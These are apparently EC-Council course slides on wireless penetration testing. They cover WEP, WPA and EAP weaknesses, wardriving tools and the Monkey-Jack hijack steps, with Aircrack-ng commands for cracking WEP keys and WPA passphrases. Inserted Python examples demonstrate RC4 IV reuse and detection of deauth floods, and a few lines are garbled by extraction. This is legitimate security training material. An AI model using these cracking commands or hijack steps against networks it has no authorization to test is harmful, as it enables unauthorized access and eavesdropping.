ecsav4 module 06 advanced wireless testing_norestriction
Post on 08-Nov-2014
Advanced Penetration Testing and Security Analysis
Module 6: Advanced Wireless Testing
EC-Council Copyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Module Objective
This module will familiarize you with:
• WarDriving with NetStumbler
• How NetStumbler Works
• “Active” vs. “Passive” WLAN Detection
• Disabling the Beacon
• Running NetStumbler
• Captured Data Using NetStumbler
• Filtering by Channels
• Wireless Penetration Testing with Windows
• AirCrack-ng
• FMS and Korek attacks
• Crack WEP
Wireless Concepts
Wireless Concepts
When most people say ‘Wireless’ these days, they are referring to one of the 802.11 standards.
Wireless communication allows networks to extend to places that might otherwise go untouched by wired networks.
There are three main 802.11 standards: B, A, and G.
802.11 has weak authentication and encryption mechanisms.
Wireless, by its very nature, has no well-defined perimeter, making security more challenging.
802.11 Types
802.11-Legacy:
• 2 Mbit/sec theoretical
• Uses CSMA/CA for collision detection and avoidance
• Can use either FHSS or DSSS for modulation
• Had no well-defined implementation
802.11b:
• 11 Mbit/sec theoretical (5.9 Mbit usually)
• Uses DSSS modulation, splitting the 2.4 GHz band into channels
• SSID: Service Set Identifier; used for network differentiation
802.11a:
• Operates in the 5 GHz band
• Uses OFDM modulation
• Theoretical 54 Mbit, realistic ~25 Mbit
• Not backwards compatible with b
• Not widely deployed
802.11 Types (cont’d)
802.11g:
• Back in the 2.4 GHz band
• Theoretical 54 Mbit, realistic ~25 Mbit
• Supports CCK (for compatibility with b)
• Natively uses OFDM
802.11n:
• Based on multiple-in/multiple-out (MIMO) technology
• Increased data rate up to 600 Mbps
• RF band: 2.4 GHz or 5 GHz
• Channel width: 20 MHz or 40 MHz
Core Issues with 802.11
No hard perimeter:
• A wired network runs from point A to point B; a wireless network runs all over the block.
• Eavesdropping and packet sniffing thus become trivial.
• Many government facilities cannot use wireless, even with higher-layer encryption, for this reason.
• Perimeter security is sometimes ‘implemented’ by disabling SSID broadcasts. However, ‘stealthed’ networks are still visible.
Core Issues with 802.11 (cont’d)
Performance and easy Denial-of-Service:
• RF communications are easy to take down: size does matter; the AP with the strongest signal wins.
• With CSMA/CA, performance is crippled; with the addition of WEP, performance drops even further.
• Easy access to the local segment means easy targeted Denial-of-Service attacks on the network level: packet flooding, ARP spoofing.
• No standard for roaming and hand-offs.
What’s the Difference?
                          | 802.11      | 802.11a                           | 802.11b              | 802.11g                           | 802.11n
Frequency                 | 2.4 GHz     | 5 GHz                             | 2.4 GHz              | 2.4 GHz                           | 2.4 or 5 GHz
Rate(s)                   | 1 or 2 Mbps | 6, 9, 12, 18, 24, 36, 48, 54 Mbps | 1, 2, 5.5 or 11 Mbps | 6, 9, 12, 18, 24, 36, 48, 54 Mbps | 600 Mbps
Modulation                | FHSS/DSSS   | OFDM                              | DSSS                 | OFDM                              | DSSS/OFDM
Effective Data Throughput | 1.2 Mbps    | 32 Mbps                           | 5 Mbps               | 32 Mbps                           | 100-200 Mbps
Advertised Range          | 300 ft      | 225 ft                            | 300 ft               | 300 ft                            | 600 ft
Encryption                | Yes         | Yes                               | Yes                  | Yes                               | Yes
Encryption Type           | 40 bit RC4  | 40 or 104 bit RC4                 | 40 or 104 bit RC4    | 40 or 104 bit RC4                 | 40 or 104 bit RC4
Authentication            | No          | No                                | No                   | No                                | Yes
Network Support           | Ethernet    | Ethernet                          | Ethernet             | Ethernet                          | WLAN
Other Types of Wireless
HiperLAN2:
• European WLAN standard
• 5 GHz range
• Up to 54 Mbps
Bluetooth:
• Short distance device
• 2.4 GHz
• 721 kbps to 10 Mbps depending on the version
Neither is compatible with the 802.11 standards.
Other Types of Wireless (cont’d)
802.16 – Wireless Metropolitan Area Network
Infrared (IR), which works at a frequency just below visible light
Narrowband, where data is sent and received on specific frequencies:
• A license must be obtained from the FCC for this space
Spread spectrum technology, which can send data over several frequencies uniformly
Spread Spectrum Background
Spread spectrum was developed decades ago by the military to send communications that would be hard to detect or jam.
It involves varying the frequency of a signal over a large portion of the spectrum, instead of being focused as in conventional communications:
• A large part of the security lies in the mathematical sequence.
• If the sequence is known, there is no added security, only survivability.
Channels
The station and AP must communicate over the same channel:
• The channel is configured at the AP.
When a station initializes or moves from one AP to another, it will tune into the channel the AP is using:
• The client will tune into the strongest signal available because it ‘thinks’ that is the closest AP.
When using several APs, they all need to be set to different channels to ensure cross talk does not occur:
• Cross talk is when an AP picks up signals from another AP and its own signals may get corrupted.
• It requires the AP to do more error recovery and signal filtering.
Access Point
The access point (AP) bridges the wireless network to the wired network.
The station and AP have to be configured to communicate over the same channel.
Service Set ID
Stations and APs use Service Set IDs (SSIDs):
• The SSID is a network name that logically contains wireless stations and APs within a specific WLAN segment.
The SSID is usually broadcast by the AP to any listening hosts.
An SSID can represent two network segments.
Default SSIDs
The following are default SSIDs (SSID: vendor):
tsunami: Cisco
101: 3Com, Symbol
RoamAbout Default Network Name: Lucent/Cabletron
Default SSID: Baystack 650/660
Compaq: Compaq
WLAN: Addtron, Dlink, SMC
Intel: Intel
linksys or Wireless: Linksys
Wireless: Various
MAC Address: SOHOware NetBlaster II
Chipsets
Prism II chipsets:
• Well supported in most wireless applications
• Linksys, older DLink
• Can usually be determined by the small N-post adapter on the end of the chipset
Orinoco chipsets:
• Lucent, Avaya, Enterasys
• Usually supported by applications (not Netstumbler)
Cisco chipset:
• Cisco Aironet 350 adapters
Atheros chipset:
• Extends the range and reduces the power consumption of 802.11 wireless networks
• AR5004X Client, AR5004G Client
Wi-Fi Equipment
Expedient Antennas
WLAN can also be fun to experiment with.
Vulnerabilities to 802.1X and RADIUS
Some early 802.1X implementations cannot use the per-session keys outlined in the IEEE 802.1X standard to encrypt the data:
• Such implementations are vulnerable to many of the WEP attacks.
No means of authenticating the access point to the user:
• An attacker can easily spoof an access point and forward a user’s credentials to the RADIUS server.
Vulnerabilities to 802.1X and RADIUS (cont’d)
If the RADIUS server is used for authentication methods other than EAP, then the following vulnerabilities can apply:
• The RADIUS shared secret is vulnerable to an offline dictionary attack, based on capture of the Response Authenticator or Message-Authenticator attribute:
• Changing the shared secret between authentication methods will fix the vulnerabilities above.
• RADIUS can still be vulnerable to a brute-force attack.
Wired Equivalent Privacy
Security - WEP
From ANSI/IEEE Std. 802.11:
“3.49 wired equivalent privacy (WEP): The optional cryptographic confidentiality algorithm specified by IEEE 802.11 used to provide data confidentiality that is subjectively equivalent to the confidentiality of a wired local area network (LAN) medium that does not employ cryptographic techniques to enhance privacy.”
Wired Equivalent Privacy (WEP)
Since wireless is inherently easy to eavesdrop on, WEP was created to provide ‘Equivalent Privacy’ to an unsecured wired network.
WEP has three main goals:
• Confidentiality: preventing casual eavesdropping
• Access control: control who is allowed to access the network
• Data integrity: ensure that messages are not tampered with
Wired Equivalent Privacy (WEP) (cont’d)
Some facts about WEP:
• WEP uses RC4 for encryption and CRC32 for integrity checking.
• WEP uses either 40 or 104 bit keys, which are then added to a 24 bit initialization vector (which just happens to be transmitted in the clear).
• WEP uses a shared key structure.
• WEP significantly impacts network performance.
Wired Equivalent Privacy (WEP) (cont’d)
If working under SKA, a WEP key is required for authentication:
• The key can also be used for data encryption.
RC4 is a symmetric algorithm which only encrypts the payload of packets:
• RC4 does not encrypt the header or trailer data.
• The same key is used for the encryption and decryption processes.
The 802.11 standard specifies a 40-bit key, and many vendors also offer a 104-bit key.
Exclusive OR
Exclusive OR (XOR) functionality:
• A function in binary mathematics.
XOR is an operation that is applied to two bits:
• If both bits are the same, the result is zero (1 + 1 = 0).
• If the bits are different from each other, the result is one (1 + 0 = 1).
Logical “either/or”:
• Output is true if either, but not both, of the inputs are true.
• Output is false if both inputs are false or both inputs are true.
Major function in all of cryptography.
Encryption Process
Message: Character Character Character Character
Plaintext bits:            1010101 1101001 1100001 0011010
Values determined by key:  1101001 0010101 1101011 0010111
XOR function
Resulting ciphertext:      0111100 1111100 0001010 0001101
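The XOR table above and the keystream reuse that the WEP Issues slides describe, as an added Python example that is not part of the original course material: it reproduces the four 7-bit results of the slide, implements RC4 keyed with IV||key the way WEP does (the CRC32 integrity value is left out), and shows why two packets protected with the same static key and the same IV expose each other's plaintext. The 40-bit key, the IV and the two packet payloads are constructed for this example.

```python
"""XOR stream encryption, worked on the slide's bits and on WEP-style RC4.

Added example, not part of the original module.  The WEP framing used here
(RC4 keyed with IV || key, no CRC32 ICV) is a simplification for illustration.
"""

# The four 7-bit plaintext characters and key-derived values from the slide.
SLIDE_PLAINTEXT = ["1010101", "1101001", "1100001", "0011010"]
SLIDE_KEYSTREAM = ["1101001", "0010101", "1101011", "0010111"]


def xor_bitstrings(p: str, k: str) -> str:
    """Bitwise XOR of two equal-length bit strings (1 where the bits differ)."""
    if len(p) != len(k):
        raise ValueError("bit strings must have equal length")
    return "".join("1" if a != b else "0" for a, b in zip(p, k))


def slide_ciphertext() -> list:
    """Reproduces the 'Resulting ciphertext' row of the slide."""
    return [xor_bitstrings(p, k) for p, k in zip(SLIDE_PLAINTEXT, SLIDE_KEYSTREAM)]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling (KSA) followed by the PRGA; returns `length` bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA: permute S under the key
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # PRGA: one keystream byte per step
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 encryption and decryption are the same XOR with the keystream."""
    return xor_bytes(data, rc4_keystream(key, len(data)))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style framing: 3-byte IV sent in the clear, RC4 keyed with IV || key."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("WEP uses a 24-bit IV with a 40- or 104-bit key")
    return iv + rc4_crypt(iv + key, plaintext)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    return rc4_crypt(iv + key, body)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """ciphertext XOR known plaintext = keystream for that IV (no key needed)."""
    return xor_bytes(frame[3:], known_plaintext)


def demo_iv_reuse() -> dict:
    """Two packets under one static key and a repeated IV share one keystream."""
    key = b"\x01\x23\x45\x67\x89"                   # constructed 40-bit key
    iv = b"\x00\x00\x2a"                            # constructed IV, reused below
    p1 = b"ARP who-has 10.0.0.1 tell 10.0.0.2 "     # predictable content (35 bytes)
    p2 = b"user=alice;session=8f3a;balance=120"     # secret content (35 bytes)
    c1, c2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    ks = recover_keystream(c1, p1)                  # learned from the known packet
    fresh = wep_encrypt(key, b"\x00\x00\x2b", p2)   # a different IV gives a new keystream
    return {
        "p2": p2,
        "xor_of_ciphertexts_equals_xor_of_plaintexts":
            xor_bytes(c1[3:], c2[3:]) == xor_bytes(p1, p2),
        "p2_from_keystream": xor_bytes(c2[3:], ks),  # IV collision: p2 falls out
        "fresh_iv_breaks_the_link": xor_bytes(fresh[3:], ks) != p2,
    }


if __name__ == "__main__":
    print("slide ciphertext:", " ".join(slide_ciphertext()))
    print(demo_iv_reuse())
```

The lesson for a defender is the last dictionary entry: confidentiality of a stream cipher rests entirely on never repeating a keystream, which a 24-bit IV under a static key cannot guarantee.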
Chipping Sequence
Random sequence: 0100101101011001
Data stream: 1010
XOR of the two: 10111011101010010
WEP Issues
CRC32 is not sufficient to ensure complete cryptographic integrity of a packet:
• By capturing two packets, an attacker can reliably flip a bit in the encrypted stream and modify the checksum so that the packet is accepted.
IVs are 24 bits:
• An AP broadcasting 1500 byte packets at 11 Mb/s would exhaust the entire IV space in five hours.
Known plaintext attacks:
• When there is an IV collision, it becomes possible to reconstruct the RC4 keystream based off of the IV and the decrypted payload of the packet.
WEP Issues (cont’d)
Dictionary attacks:
• WEP is password-based.
Denial-of-Service:
• Associate and disassociate messages are not authenticated.
Eventually, an attacker can construct a decryption table of reconstructed key streams:
• With about 24 GB of space, an attacker can use this table to decrypt WEP packets in real time.
WEP Issues (cont’d)
A lack of centralized key management makes it difficult to change WEP keys with any regularity.
The IV is a value that is used to randomize the key stream value, and each packet has an IV value:
• The standard only allows 24 bits, which can be used up within hours at a busy AP.
• IV values will be reused.
The standard does not dictate that each packet must have a unique IV, so vendors use only a small part of the available 24-bit possibilities:
• A mechanism that depends on randomness is not very random at all, and attackers can easily figure out the key stream and decrypt other messages.
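The arithmetic behind the “five hours”, the IV reuse and the “about 24 GB” table figures on the three WEP Issues slides, as an added Python example that is not part of the original module. It uses the slides’ own parameters (24-bit IV, 1500-byte frames, 11 Mb/s) and goes one step further with the birthday bound for cards that pick IVs at random, plus a constructed model of a card whose IV counter restarts at zero after every power cycle.

```python
"""WEP IV arithmetic: exhaustion time, reuse, and the precomputed table size.

Added example, not part of the original module; the constants are the slides'
figures, the power-cycle model is constructed for illustration.
"""
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS                 # 16,777,216 distinct IVs per key


def seconds_to_exhaust_ivs(frame_bytes: int = 1500, rate_bps: int = 11_000_000) -> float:
    """Time for an AP sending back-to-back frames (one IV each) to use every IV once."""
    frames_per_second = rate_bps / (frame_bytes * 8)
    return IV_SPACE / frames_per_second


def hours_to_exhaust_ivs(frame_bytes: int = 1500, rate_bps: int = 11_000_000) -> float:
    return seconds_to_exhaust_ivs(frame_bytes, rate_bps) / 3600.0


def collision_probability_random_ivs(frames: int) -> float:
    """Birthday bound: P(at least one repeated IV) among `frames` random 24-bit IVs."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * IV_SPACE))


def frames_for_collision_probability(p: float) -> int:
    """Smallest number of random-IV frames at which the collision probability reaches p."""
    n = int(math.sqrt(2.0 * IV_SPACE * math.log(1.0 / (1.0 - p))))   # closed-form estimate
    while collision_probability_random_ivs(n) < p:                   # then correct upward
        n += 1
    return n


def count_iv_reuse(iv_sequence) -> int:
    """Frames in an observed per-key IV sequence whose IV was already seen."""
    seen, repeats = set(), 0
    for iv in iv_sequence:
        if iv in seen:
            repeats += 1
        else:
            seen.add(iv)
    return repeats


def resetting_counter_ivs(frames_per_power_cycle: int, power_cycles: int):
    """Constructed model: a card that restarts its IV counter at 0 after each power cycle,
    so only a small part of the 24-bit space is ever used and early IVs repeat often."""
    for _ in range(power_cycles):
        for iv in range(frames_per_power_cycle):
            yield iv


def decryption_table_bytes(frame_bytes: int = 1500) -> int:
    """One recovered keystream of `frame_bytes` for every IV: the 'about 24 GB' table."""
    return IV_SPACE * frame_bytes


if __name__ == "__main__":
    print(f"IV space exhausted in {hours_to_exhaust_ivs():.2f} hours at 11 Mb/s, 1500-byte frames")
    print(f"random IVs: 50% collision chance after {frames_for_collision_probability(0.5)} frames")
    print(f"counter reset each boot (1000 frames x 3 boots): "
          f"{count_iv_reuse(resetting_counter_ivs(1000, 3))} reused IVs")
    print(f"full keystream table: {decryption_table_bytes() / 2**30:.1f} GiB")
```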
WEP - Authentication Phase
When a wireless station wants to access a network, it sends a probe request packet on all channels so that any AP in range will respond.
The AP responds with packets containing the AP’s SSID and other network information:
• When open system authentication (OSA) is configured, the station will send an authentication request to the AP and the AP will make an access decision based on its policy.
• When shared key authentication (SKA) is configured, the AP will send a challenge to the station, and the mobile station encrypts it with its WEP key and sends it back to the AP:
• If the AP can successfully decrypt it and obtain the challenge value, the mobile station’s access is authorized.
WEP - Shared Key Authentication
The requesting station sends the challenge text.
The receiving station:
• Decrypts the challenge using the same shared key.
• Compares it to the challenge text sent earlier.
• If they match, an acknowledgement is sent.
• If no match, sends a negative authentication notice.
Once acknowledged, the transmission is sent.
WEP - Association Phase
After the authentication phase, the station will send the AP an association request packet.
If the AP has a policy to allow this station to access the network, it will associate the station to itself by placing the station in its association table.
A wireless device has to be associated with an AP to access network resources, and not just authenticated.
The authentication and association phases authorize the device, and not the user.
There is no way to know if an unauthorized user has stolen and is using an authorized device.
WEP Flaws
Two basic flaws undermine its ability to protect against a serious attack.
No defined method for encryption key distribution:
• Pre-shared keys were set once at installation and are rarely (if ever) changed.
Use of RC4, which was designed to be a one-time cipher and not intended for multiple message use:
• Since the pre-shared key is rarely changed, the same key is reused.
• An attacker monitors traffic and finds enough examples to work out the plaintext from message context.
• With knowledge of the ciphertext and plaintext, you can compute the key.
WEP Attack
It takes at least 10,000 packets to discover the key:
• A large amount of known data is the fastest way of determining as many key streams as possible.
Wep Weggie (part of BSD-Airtools) can be used to generate a large number of small packets:
• The information may be as innocuous as the fields in the protocol header or the DNS name query.
• Monitoring is passive and therefore undetectable.
• Simple tools and instructions are readily available to recover the key.
Wireless Security Technologies
WPA Interim 802.11 Security
Wi-Fi Protected Access (WPA)
Interim solution between WEP and 802.11i:
• Plugs holes in legacy 802.11 devices
• Typically requires firmware or driver upgrade, but not new hardware
• Subset of 802.11i and is forward compatible
Sponsored by the Wi-Fi Alliance:
• Will require WPA for current certifications
Support announced by Microsoft, Intel, others
WPA
Works similarly to 802.1X authentication:
• Both clients and AP must be WPA-enabled for encryption to and from the 802.1X EAP server
• Key in a passphrase (master key) in both client and AP
• If the passphrase matches, then the AP allows entry to the network
• Passphrase remains constant, but a new encryption key is generated for each session
WPA2 (Wi-Fi Protected Access 2)
WPA2 is compatible with the 802.11i standard.
WPA2 provides government-grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm.
WPA2 offers two modes of operation:
• Enterprise: verifies network users through a server.
• Personal: protects against unauthorized network access by utilizing a set-up password.
802.1X Authentication and EAP
802.1X:
• Framework to control port access between clients, the AP, and servers
Uses Extensible Authentication Protocol (EAP):
• EAP is discussed in RFC 2284
• Uses dynamic keys instead of the static WEP authentication key
• Requires a mutual authentication protocol
• User’s transmission must go through the WLAN AP to reach the server performing the authentication
• Permits a number of authentication methods
• RADIUS is the market de facto standard
EAP Types
EAP-TLS:
• EAP is an extension of PPP providing for additional authentication methods.
• TLS provides for mutual authentication and session key exchange.
• Negotiated mutual key becomes the master key for 802.11 TKIP.
• Requires client and server certificates (PKI-based).
• Deployed by Microsoft for its corporate network.
• Shipping in Windows 2000 and XP.
• EAP-TLS is discussed in RFC 2716.
Cisco LEAP
Lightweight Extensible Authentication Protocol
In August 2003, it was discovered that Cisco LEAP is vulnerable to brute-force and dictionary attacks:
• Therefore, Cisco warns users to adhere to strong passwords.
Use PEAP (Protected Extensible Authentication Protocol) instead of LEAP, which supports:
• Digital certificates.
• One-time passwords.
TKIP (Temporal Key Integrity Protocol)
Quick fix to overcome the encryption key reuse problem with WEP
Still uses WEP RC4, but changes the temporal key every 10K packets
Mandates use of MIC to prevent packet forgery
Uses existing device calculation capabilities to perform the encryption operations
Improves security, but is still only a short-term fix
Wireless Networks Testing
This is a method for testing wireless access to a LAN and is becoming increasingly popular.
However, some fairly alarming problems, security-wise, are common when implementing these technologies.
Expected results:
• The outer-most physical edge of the wireless network.
• The logical boundaries of the wireless network.
• Access points into the network.
• IP range (and possibly DHCP server) of the wireless network.
• Exploitable "mobile units" (clients).
Wireless Networks Testing (cont’d)
Verify the distance to which the wireless communication extends beyond the physical boundaries of the organization
List equipment needed/tried (antenna, card, amplifier, software, etc.)
Verify the authentication method of the clients
Verify that encryption is configured and running
Verify what key length is used
Verify the IP range of the network
Verify the IP range reachable from the wireless network, and the protocols involved
Probe the network for possible DoS problems
Wireless Communications Testing
This is a method of testing cordless communication devices which may exceed the physical and monitored boundaries of an organization.
Expected results:
• The outer-most physical edge of the wireless communications.
• The logical boundaries of the wireless communications.
• List of communication types.
• Type of wireless communication used and in what spectrum.
• List of frequencies emanating from the target.
• List of vulnerabilities in the wireless communication present.
Report Recommendations
Verify that the organization has an adequate security policy that addresses the use of wireless technology, including the use of 802.11.
Maintain a complete inventory of all wireless devices on the network.
Evaluate the physical access controls to Access Points (APs) and devices controlling them.
Determine if APs are turned off during portions of the day when they will not be in use.
Verify that the AP SSIDs have been changed.
Verify that all wireless clients have anti-virus software installed.
Wireless Attack Countermeasures
Enable 104-bit WEP
Change the default SSID and disable its broadcast
Implement another layer of authentication
Physically put the AP at the center of the building
Logically put the AP in a DMZ with a firewall between the DMZ and the internal network
Implement VPN for wireless stations to use
Configure an ACL on the AP and/or firewall to allow only known addresses into the network
Assign static IPs to stations and disable DHCP
Wireless Penetration Testing with Windows
The first step in performing a wireless penetration test is determining which wireless network is the target.
This is usually done by conducting a WarDrive.
Once you’ve determined the correct network to attack, you need to break any encryption used on the network.
Once the security is broken, sniff for sensitive traffic.
Attacks and Tools
War Driving
War Driving is performed on a laptop/PC with a wireless NIC, antenna (omni-directional is best), sniffers (TCPDump, Ethereal), NetStumbler, and AirSnort or WEPCrack.
NetStumbler finds WLAN APs and logs:
• Network name
• SSID
• MAC address of AP
• Channel heard on
• Signal strength
• If WEP is enabled
AirSnort and WEPCrack run algorithms on captured traffic to crack WEP keys.
The Jargon – WarChalking
A marking method is only as good as the number of people that know it.
There is a common standard being developed amongst warchalkers to offer a common marking scheme.
Check out www.warchalking.org for more details.
The Jargon – WarChalking (cont’d)
Bumper Sticker:
WarPumpkin
WLAN hackers can adapt to seasonal changes:
• Open WLAN, SSID=GoAway, Speed=1.5Mbps
Wireless: Tools of the Trade
Detectors:
• Kismet
• Netstumbler
Crackers:
• Airsnort
• WEPCrack
MITM tools:
• MonkeyJack
• AirJack
Mapping with Kismet
Kismet is a Linux wireless tool
It’s free
Captures all packets received
Supports GPS and mapping
Logging is flexible and configurable
Installation can be difficult
Requires driver and kernel patches
Included with Knoppix
Mapping with Kismet (cont’d)
Comes with its own gpsmap program
Does signal strength guessing and interpolation
Not so accurate
Kismet: Screenshot
WarDriving with NetStumbler
NetStumbler is the application used most by WarDrivers that use a Windows operating system.
While originally designed as a wireless network tool, NetStumbler has grown in popularity due to WarDrivers.
NetStumbler provides radio frequency (RF) signal information and other data related to combining computers and radios.
It also provides information on the band and data format being used, depending on which wireless networking card is being implemented (802.11b, 802.11a, or 802.11g).
How Does NetStumbler Work?
NetStumbler is an active wireless network detection application that does not i l li t f i bpassively listen for, or receive, beacons.
It does not collect packets.
If it detects an infrastructure WLAN, it requests the AP’s name.
When it finds an ad-hoc WLAN, it requests the names of all of the peers it sees.
Its interface provides filtering and analysis toolsIts interface provides filtering and analysis tools.
NetStumbler: Screenshot
“Active” vs. “Passive” WLAN Detection
NetStumbler is an “active” wireless network detection application that takes a specific action to accomplish WLAN detection.
This action sends out a specific data probe called a Probe Request.
The Probe Request frame and the associated Probe Response frame are part of the 802.11 standard.
Applications that employ “passive” detection do not broadcast any signals.
These programs listen to the radio band for any 802.11 traffic that is within range of the wireless card.
Disabling the Beacon
NetStumbler transmits a Broadcast Request probe to discover the WLAN.
Most access points respond to a Broadcast Request by default.
When the access point responds, it transmits its SSID, MAC number, and other information.
Many brands and models of access points allow this feature to be disabled.
Once an access point ceases to respond to a request, NetStumbler can no longer detect it.
If you don’t want your WLAN to show up on the screen of another NetStumbler user, disable the SSID broadcast on your access point.
Running NetStumbler
When NetStumbler starts, it immediately attempts to locate a usable wireless card and a global positioning system (GPS) receiver.
The application also opens a new file with extension ns1 (NetStumbler1).
The file name is derived from the date and time when NetStumbler was started, and is in the YYYYMMDDHHMMSS.ns1 format.
If a wireless card is located, the program begins to scan for nearby access points.
The data from any located access points is immediately entered into the new file.
Captured Data using NetStumbler
Filtering by Channels
Airsnort
WEPCrack
Monkey-Jack
Attacker launches DoS attack
Victim’s 802.11 card scans channels to search for new AP
Victim’s 802.11 card associates with fake AP on the attack machine
Attack machine associates with real AP
Attack machine is now inserted and can pass frames through in a manner that is transparent to the upper level protocols
How Monkey-Jack Works
No per-packet authentication:
• Client or AP can easily be spoofed
Client station will actively scan for new AP after being disassociated
Attacker impersonates AP:
• Offers authentication
Legitimate AP is clueless
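Both the “active” detection described above (NetStumbler’s wildcard Probe Request) and the deauthentication burst that opens a Monkey-Jack hijack are visible to anyone listening in monitor mode. As an added example that is not code from this module, the following classifier shows how a wireless IDS sensor can flag both; every frame is constructed for the demo, and the scanner MAC and the flood threshold are assumptions.

```python
# Added example, not code from the EC-Council module: a small 802.11 management
# frame classifier of the kind a wireless IDS sensor runs over monitor-mode
# captures. It flags wildcard Probe Requests (the "active" detection technique
# NetStumbler uses, visible to anyone listening) and bursts of Deauthentication
# or Disassociation frames (the first step of a Monkey-Jack hijack). Every frame
# below is constructed; the scanner MAC and the threshold are assumptions.
from collections import Counter

TYPE_MGMT = 0
SUBTYPE_PROBE_REQ = 4
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12

BROADCAST = bytes.fromhex("ffffffffffff")
AP_BSSID = bytes.fromhex("0013101e6542")   # target AP from the module's example
CLIENT = bytes.fromhex("00022d2d8236")     # connected client from the module's example
SCANNER = bytes.fromhex("001122334455")    # constructed: an active scanner


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt(subtype, dst, src, bssid, body=b""):
    """Build a management frame: frame control (type/subtype), duration,
    addr1=dst, addr2=src, addr3=bssid, sequence control, then the body."""
    frame_control = bytes([(TYPE_MGMT << 2) | (subtype << 4), 0x00])
    return frame_control + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body


def parse_mgmt(frame):
    """Return the header fields of a management frame, or None for other types."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    if (fc >> 2) & 0x3 != TYPE_MGMT:
        return None
    return {
        "subtype": (fc >> 4) & 0xF,
        "dst": mac_str(frame[4:10]),
        "src": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "body": frame[24:],
    }


def probe_request_ssid(body):
    """SSID from the first tagged parameter (tag 0) of a Probe Request body.
    An empty string is the wildcard SSID that 'active' scanners send."""
    if len(body) < 2 or body[0] != 0:
        return None
    length = body[1]
    return body[2:2 + length].decode("utf-8", "replace")


def analyze(frames, deauth_threshold=5):
    """Return (active_scanners, deauth_floods): source MACs that sent wildcard
    Probe Requests, and BSSIDs that saw at least deauth_threshold
    deauth/disassoc frames in this batch."""
    scanners = set()
    deauth_per_bssid = Counter()
    for frame in frames:
        hdr = parse_mgmt(frame)
        if hdr is None:
            continue  # data and control frames are not of interest here
        if hdr["subtype"] == SUBTYPE_PROBE_REQ and probe_request_ssid(hdr["body"]) == "":
            scanners.add(hdr["src"])
        elif hdr["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            deauth_per_bssid[hdr["bssid"]] += 1
    floods = [b for b, n in deauth_per_bssid.items() if n >= deauth_threshold]
    return sorted(scanners), sorted(floods)


# Constructed sample batch: one wildcard probe, one directed probe for
# "VisitorLAN" (a normal client roaming, not flagged), one data frame that is
# ignored, and six deauth frames (reason code 7) aimed at the client.
SAMPLE_FRAMES = [
    build_mgmt(SUBTYPE_PROBE_REQ, BROADCAST, SCANNER, BROADCAST, b"\x00\x00"),
    build_mgmt(SUBTYPE_PROBE_REQ, BROADCAST, CLIENT, BROADCAST,
               b"\x00" + bytes([len(b"VisitorLAN")]) + b"VisitorLAN"),
    bytes([0x08, 0x00]) + b"\x00" * 22,   # data frame, type 2
] + [build_mgmt(SUBTYPE_DEAUTH, CLIENT, AP_BSSID, AP_BSSID, b"\x07\x00") for _ in range(6)]

if __name__ == "__main__":
    scanners, floods = analyze(SAMPLE_FRAMES)
    print("active scanners:", scanners)
    print("deauth floods against BSSID:", floods)
```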
Before Monkey-Jack
After Monkey-Jack
Monkey-Jack: Screenshot
AirCrack-ng
AirCrack-ng is available from www.aircrack-ng.org
Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program.
Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ng.
Aircrack-ng suite performs various statistical attacks to discover the WEP key with small amounts of captured data combined with brute forcing.
For cracking WPA/WPA2 pre-shared keys, a dictionary method is used.
AirCrack-ng: How Does it Work?
Multiple techniques are combined to crack the WEP key:
• FMS (Fluhrer, Mantin, Shamir) attacks - statistical techniques
• Korek attacks - statistical techniques
• Brute force
When using the statistical techniques to crack a WEP key, each byte of the key is basically handled individually.
Using statistical mathematics, the possibility that a certain byte in the key is guessed right goes up to as much as 15% when you capture the right initialization vector (IV) for a particular key byte.
Certain IVs “leak” the secret WEP key for particular key bytes.
This is the fundamental basis of the statistical techniques.
AirCrack-ng: FMS and Korek Attacks
By using a series of statistical tests called the FMS and Korek attacks, votes are accumulated for likely keys for each key byte of the secret WEP key.
Different attacks have a different number of votes associated with them since the probability of each attack yielding the right answer varies mathematically.
The more votes a particular potential key value accumulates, the more likely it is to be correct.
For each key byte, the screen shows the likely secret key and the number of votes it has accumulated so far.
The secret key with the largest number of votes is most likely correct but is not guaranteed.
The techniques and the approach above do not work for WPA/WPA2 pre-shared keys.
The only way to crack these pre-shared keys is via a dictionary attack.
AirCrack-ng: Crack WEP
To crack WEP, start by opening a console window. On the command line, launch AirCrack-ng using the following syntax:
• aircrack-ng -a 1 filename.cap
You can specify multiple input files (either in .cap or .ivs format).
You can run both airodump-ng and aircrack-ng at the same time: aircrack-ng will auto-update when new IVs are available.
AirCrack-ng: Available Options
AirCrack-ng: Usage Examples
AirCrack-ng: Cracking WPA/WPA2 Passphrases
aircrack-ng -w password.lst *.cap
Where:
-w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory.
*.cap is the name of a group of files containing the IVs.
You can use wildcard * to include multiple files.
AirCrack-ng: Cracking WPA/WPA2 Passphrases (cont’d)
AirCrack-ng: Notes
